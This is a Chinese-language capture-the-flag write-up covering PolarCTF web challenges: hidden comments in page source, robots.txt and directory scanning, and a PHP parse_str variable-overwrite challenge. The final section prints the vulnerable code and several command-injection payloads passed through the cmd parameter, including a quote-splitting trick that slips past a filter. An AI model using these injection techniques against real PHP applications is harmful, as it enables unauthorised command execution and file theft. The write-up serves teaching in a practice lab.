polarctf靶场[WEB]Don‘t touch me、机器人、uploader、扫扫看

[web]Don't touch me

考点：查看源代码、前端

打开网页，叫我们找flag

我们打开源代码，发现了一个被注释的子域

访问，是另一个界面

在看源代码，发现有个3.php，点开

就可以发现了被注释的flag文件，fla.php

访问，得到本题flag

[web]机器人

考点：robot协议

工具：御剑，kali dirsearch

题目说是机器人，所以考虑是robots协议

当robots访问一个网站（比如http://www.abc.com）时，首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件，如果机器人找到这个文件，它就会根据这个文件的内容，来确定它访问权限的范围。（也就相当于一个管理权限的文件）

robots.txt文件用法举例：

User-agent(搜索引擎robots的名字)：*(*代表所有）

Disallow(以Disallow开头的url都禁止访问)：/(代表禁止所有引擎访问网站任何部分）

例：

User-agent:baiduspider

Disallow:

User-agent:*

Disallow:/

代表允许baiduspider来访问网站任何，其他都不行

进入robots.txt文件查看一下权限或者被隐藏了哪些，或者不确定访问什么可以用御剑或者kali 的dirsearch工具进行目录扫描

看到了一部分的flag，再看Disallow，应该是个目录

访问/27f5e15b6af3223f1176293cd015771d/flag.php

得到另一部分的flag，拼接一起便可得到flag

[web]覆盖

考点：`@parse_str覆盖`

php 复制代码

 <?php
error_reporting(0);
if (empty($_GET['id'])) {
    show_source(__FILE__);
    die();
} else {
    include 'flag.php';
    $a = "www.baidu.com";
    $result = "";
    $id = $_GET['id'];
    @parse_str($id);
    echo $a[0];
    if ($a[0] == 'www.polarctf.com') {
        $ip = $_GET['cmd'];
        $result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
        if ($result) {
            echo "<pre>{$result}</pre>";
        }
    } else {
        exit('其实很简单！');
    }
}

这段代码是一个简单的 PHP 网页应用，主要功能是根据特定条件执行命令并返回结果。如果没有提供 id 参数，就显示当前文件的源代码并终止程序。如果提供了 id 参数，并且通过特定方式将变量 $a 的第一个字符修改为 www.polarctf.com，同时提供 cmd 参数，就会执行 ping 命令并返回结果。

@parse_str($id);：这个函数不会检查变量 $id 是否存在，如果通过其他方式传入数据给变量$ id ,且当前$id中数据存在，它将会直接覆盖掉

$result.= shell_exec('ping -c 2 '. $a[0]. $ip); ：使用 shell_exec 函数执行 ping 命令，向 "www.polarctf.com" 和变量 $ip 指定的地址发送两个 ICMP 数据包，并将结果存储在变量 $result 中。

发现a[0]的值确实被更改了，那么接下来就简单了，先构造一个cmd=|ls;，发现回显了flag.php,但是不能直接读取，我们尝试用读取ls的命令,而且cat似乎被覆盖过滤了，所以我们使用tac。

有集中方法进行构造：

php 复制代码

?id=a[0]=www.polarctf.com&cmd=|tac `ls`;//回显之后直接可得到flag
 
?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;tac%20flag*
或?id=a[0]=www.polarctf.com&cmd=;tac%20fl''ag.php
?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag